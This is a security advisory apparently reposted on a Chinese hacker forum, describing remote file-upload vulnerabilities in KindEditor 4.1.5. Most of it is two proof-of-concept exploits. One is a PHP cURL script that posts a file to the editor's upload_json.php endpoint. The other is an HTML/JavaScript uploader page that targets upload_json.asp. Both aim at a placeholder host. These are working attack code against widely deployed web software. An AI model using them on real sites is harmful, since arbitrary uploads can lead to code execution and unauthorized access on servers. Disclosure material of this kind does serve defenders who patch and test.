|
|
- source: http://www.securityfocus.com/bid/58431/info
- KindEditor is prone to multiple remote file-upload vulnerabilities because it fails to sufficiently sanitize user-supplied input.
- Attackers can exploit these issues to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
- KindEditor 4.1.5 is vulnerable; other versions may also be affected.
- <?php
-
- $uploadfile="KedAns.txt";
- $ch = curl_init("http://www.example.com/kindeditor/php/upload_json.php?dir=file");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS,
- array('imgFile'=>"@$uploadfile"));
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- $postResult = curl_exec($ch);
- curl_close($ch);
- print "$postResult";
-
- ?>
- # KindEditor (ASP,ASP.NET,JSP,PHP) _JSON Uploader :
- --------------------------------------------------
- <html><head>
- <title>Uploader By KedAns-Dz</title>
- <script src="http://www.example.com/kindeditor/kindeditor-min.js"></script>
- <script>
- KindEditor.ready(function(K) {
- var uploadbutton = K.uploadbutton({
- button : K('#uploadButton')[0],
- fieldName : 'imgFile',
- url : 'http://www.example.com/kindeditor/php/upload_json.asp?dir=file',
- afterUpload : function(data) {
- if (data.error === 0) {
- var url = K.formatUrl(data.url, 'absolute');
- K('#url').val(url);}
- },
- });
- uploadbutton.fileBox.change(function(e) {
- uploadbutton.submit();
- });
- });
- </script></head><body>
- <div class="upload">
- <input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />
- <input type="button" id="uploadButton" value="Upload" />
- </div>
- </body>
- </html>
|
|
|小黑屋|手机版|中国白客联盟-BUC
( 赣ICP备15007148号-6 ) 
窥视卡
雷达卡
发表于 2016-3-20 21:22:32
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡